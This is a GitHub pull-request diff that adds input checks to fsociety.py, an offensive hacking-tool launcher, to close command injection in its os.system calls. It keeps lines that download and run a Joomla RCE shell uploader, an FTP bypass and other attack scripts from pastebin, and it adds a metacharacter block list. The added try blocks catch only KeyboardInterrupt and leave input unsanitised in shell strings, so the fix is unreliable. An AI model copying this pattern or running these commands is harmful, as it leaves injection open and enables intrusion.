Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Security Fix for Remote Code Execution - huntr.dev #117

Open
wants to merge 11 commits into
base: master
Choose a base branch
from
Open

Security Fix for Remote Code Execution - huntr.dev #117

Changes from all commits
Commits
Show all changes
11 commits
Select commit Hold shift + click to select a range
b34b267
bug fixes
d3m0n-r00t Jul 24, 2020
d6e7ffb
bug fix
d3m0n-r00t Jul 24, 2020
0a12e56
update bug fix
d3m0n-r00t Jul 25, 2020
31ce86e
update fix
d3m0n-r00t Jul 25, 2020
67cd70b
fux updated
d3m0n-r00t Jul 25, 2020
d8477b3
fix updates
d3m0n-r00t Jul 25, 2020
ba18e08
all fixes
d3m0n-r00t Jul 26, 2020
9d28d77
all fixes
d3m0n-r00t Jul 26, 2020
c760f9e
update all fixes
d3m0n-r00t Jul 26, 2020
00505d6
update all fixes
d3m0n-r00t Jul 26, 2020
b9bdc3a
Merge pull request #1 from d3m0n-r00t/master
JamieSlome Jul 28, 2020
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
173 changes: 130 additions & 43 deletions fsociety.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -466,8 +466,18 @@ def install(self):
def run(self):
clearScr()
print(self.nmapLogo)
target = raw_input(self.targetPrompt)
self.menu(target)
target = raw_input(self.targetPrompt).split(' ')[0]
test_target = target.split('/')
try:
socket.gethostbyname(test_target[0])
if len(test_target) > 1:
try:
int(test_target[1])
except KeyboardInterrupt:
informationGatheringMenu()
self.menu(target)
except KeyboardInterrupt:
informationGatheringMenu()

def menu(self, target):
clearScr()
Expand Down Expand Up @@ -558,8 +568,19 @@ def __init__(self):
self.install()
clearScr()
print(self.wpscanLogo)
target = raw_input(" Enter a Target: ")
self.menu(target)
target = raw_input(" Enter a Target: ").split(' ')[0]
test_target = ''
if target[0:4] == 'http':
test_target = target
else:
test_target = 'http://'+target
try:
url = urlparse(test_target)
socket.gethostbyname(url.netloc)
target = url.scheme + '://' + url.netloc + url.path
self.menu(target)
except KeyboardInterrupt:
informationGatheringMenu()

def installed(self):
return (os.path.isdir(self.installDir))
Expand Down Expand Up @@ -618,10 +639,21 @@ def __init__(self):
self.install()
clearScr()
print(self.CMSmapLogo)
target = raw_input(" Enter a Target: ")
self.run(target)
response = raw_input(continuePrompt)

target = raw_input(" Enter a Target: ").split(' ')[0]
test_target = ''
if target[0:4] == 'http':
test_target = target
else:
test_target = 'http://'+target
try:
url = urlparse(test_target)
socket.gethostbyname(url.netloc)
target = url.scheme + '://' + url.netloc + url.path
self.run(target)
response = raw_input(continuePrompt)
except KeyboardInterrupt:
informationGatheringMenu()

def installed(self):
return (os.path.isdir(self.installDir))

Expand Down Expand Up @@ -686,9 +718,20 @@ def __init__(self):
self.install()
clearScr()
print(self.doorkLogo)
target = raw_input(" Enter a Target: ")
self.run(target)
response = raw_input(continuePrompt)
target = raw_input(" Enter a Target: ").split(' ')[0]
test_target = ''
if target[0:4] == 'http':
test_target = target
else:
test_target = 'http://'+target
try:
url = urlparse(test_target)
socket.gethostbyname(url.netloc)
target = url.scheme + '://' + url.netloc + url.path
self.run(target)
response = raw_input(continuePrompt)
except KeyboardInterrupt:
informationGatheringMenu()

def installed(self):
return (os.path.isdir(self.installDir))
Expand All @@ -699,8 +742,6 @@ def install(self):
os.system("pip install beautifulsoup4 requests Django==1.11")

def run(self, target):
if not "http://" in target:
target = "http://" + target
logPath = "logs/doork-" + \
strftime("%Y-%m-%d_%H:%M:%S", gmtime()) + ".txt"
try:
Expand Down Expand Up @@ -999,8 +1040,12 @@ def install(self):
os.system("cd %s && chmod +x install.sh && ./install.sh" % self.installDir)

def run(self):
target = raw_input("Enter Target IP: ")
os.system("brutex %s" % target)
target = raw_input("Enter Target IP: ").split(' ')[0]
try:
socket.gethostbyname(target)
os.system("brutex %s" % target)
except KeyboardInterrupt:
fsociety()


class arachni:
Expand All @@ -1024,9 +1069,20 @@ def install(self):
"gem install bundler && bundle install --without prof && rake install")

def run(self):
target = raw_input("Enter Target Hostname: ")
os.system("arachni %s --output-debug 2> %sarachni/%s.log" %
(target, logDir, strftime("%Y-%m-%d_%H:%M:%S", gmtime())))
target = raw_input("Enter Target Hostname: ").split(' ')[0]
test_target = ''
if target[0:4] == 'http':
test_target = target
else:
test_target = 'http://'+target
try:
url = urlparse(test_target)
socket.gethostbyname(url.netloc)
target = url.scheme + '://' + url.netloc + url.path
os.system("arachni %s --output-debug 2> %sarachni/%s.log" %
(target, logDir, strftime("%Y-%m-%d_%H:%M:%S", gmtime())))
except KeyboardInterrupt:
fsociety()

# Updated to Here

Expand All @@ -1044,9 +1100,18 @@ def gabriel():
print("Abusing authentication bypass of Open&Compact (Gabriel's)")
os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py")
clearScr()
common_commands = ['get','put','list','GET','PUT','LIST']
os.system("python gabriel.py")
ftpbypass = raw_input("Enter Target IP and Use Command:")
os.system("python gabriel.py %s" % ftpbypass)
ftpbypass = raw_input("Enter Target IP and Use Command:").split(' ')
try:
socket.gethostbyname(ftpbypass[0])
if ftpbypass[1] in common_commands:
os.system("python gabriel.py %s %s" % (ftpbypass[0],ftpbypass[1]))
else:
print 'Command Error!!. Please check the Use command.'
fsociety()
except KeyboardInterrupt:
fsociety()


def sitechecker():
Expand All @@ -1068,11 +1133,19 @@ def ifinurl():
def bsqlbf():
clearScr()
print("This tool will only work on blind sql injection")
cbsq = raw_input("select target: ")
os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl")
os.system("perl bsqlbf.pl -url %s" % cbsq)
os.system("rm bsqlbf.pl")

cbsq = raw_input("select target: ").split(' ')[0]
test_target = urlparse(cbsq)
try:
socket.gethostbyname(test_target.netloc)
if test_target.scheme != '':
cbsq = test_target.scheme + '://' + test_target.netloc + test_target.path
else:
cbsq = test_target.netloc + test_target.path
os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl")
os.system("perl bsqlbf.pl -url %s" % cbsq)
os.system("rm bsqlbf.pl")
except KeyboardInterrupt:
fsociety()

def atscan():
print ("Do You To Install ATSCAN ?")
Expand Down Expand Up @@ -1106,16 +1179,21 @@ def joomlarce():
os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py")
clearScr()
print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt")
jmtarget = raw_input("Select a targets list:")
os.system("python temp.py %s" % jmtarget)

jmtarget = raw_input("Select a targets list:").split(' ')[0]
try:
if os.path.exists(jmtarget):
os.system("python temp.py %s" % jmtarget)
except KeyboardInterrupt:
fsociety()

def inurl():
dork = raw_input("select a Dork:")
output = raw_input("select a file to save:")
os.system(
"./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output))
webHackingMenu.completed("InurlBR")
dork = raw_input("select a Dork:").split(' ')[0]
output = raw_input("select a file to save:").split(' ')[0]
all_dorks = ['dork:', 'dork-file:', 'exploit-cad:', 'range:', 'range-rand:', 'irc:', 'exploit-all-id:', 'exploit-vul-id:', 'exploit-get:', 'exploit-post:', 'regexp-filter:', 'exploit-command:', 'command-all:', 'command-vul:', 'replace:', 'remove:', 'regexp:', 'sall:', 'sub-file:', 'sub-get::', 'sub-concat:', 'user-agent:', 'url-reference:', 'delay:', 'sendmail:', 'time-out:', 'http-header:', 'ifcode:', 'ifurl:', 'ifemail:', 'mp:', 'target:', 'no-banner::', 'gc::', 'proxy:', 'proxy-file:', 'time-proxy:', 'pr::', 'proxy-http-file:', 'update::', 'info::', 'help::', 'unique::', 'popup::', 'ajuda::', 'install-dependence::', 'cms-check::', 'sub-post::', 'robots::', 'alexa-rank::', 'beep::', 'exploit-list::', 'tor-random::', 'shellshock::', 'dork-rand:', 'sub-cmd-all:', 'sub-cmd-vul:', 'port-cmd:', 'port-scan:', 'port-write:', 'ifredirect:', 'persist:', 'file-cookie:', 'save-as:']
if dork in all_dorks:
os.system(
"./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output))
webHackingMenu.completed("InurlBR")


def insinurl():
Expand Down Expand Up @@ -1311,20 +1389,29 @@ def shellnoob():


def androidhash():
key = raw_input("Enter the android hash: ")
salt = raw_input("Enter the android salt: ")
os.system(
"git clone --depth=1 https://github.com/PentesterES/AndroidPINCrack.git")
os.system(
"cd AndroidPINCrack && python AndroidPINCrack.py -H %s -s %s" % (key, salt))
key = raw_input("Enter the android hash: ").split(' ')[0]
salt = raw_input("Enter the android salt: ").split(' ')[0]
symbols = ['!','@','#','$','%','^','&','*','(',')','-','=','+','|','||','&&','/','//','+', ' ']
if [symbol for symbol in symbols if symbol not in key and symbol not in salt] == symbols:
os.system(
"git clone --depth=1 https://github.com/PentesterES/AndroidPINCrack.git")
os.system(
"cd AndroidPINCrack && python AndroidPINCrack.py -H %s -s %s" % (key, salt))
else:
print 'Hash or Slat Error. Please check the hash and salt.'
fsociety()


def cmsfew():
print("your target must be Joomla, Mambo, PHP-Nuke, and XOOPS Only ")
target = raw_input("Select a target: ")
os.system(
"wget https://dl.packetstormsecurity.net/UNIX/scanners/cms_few.py.txt -O cms.py")
os.system("python cms.py %s" % target)
target = raw_input("Select a target: ").split(' ')[0]
try:
socket.gethostbyname(target)
os.system(
"wget https://dl.packetstormsecurity.net/UNIX/scanners/cms_few.py.txt -O cms.py")
os.system("python cms.py %s" % target)
except KeyboardInterrupt:
fsociety()


def smtpsend():
Expand Down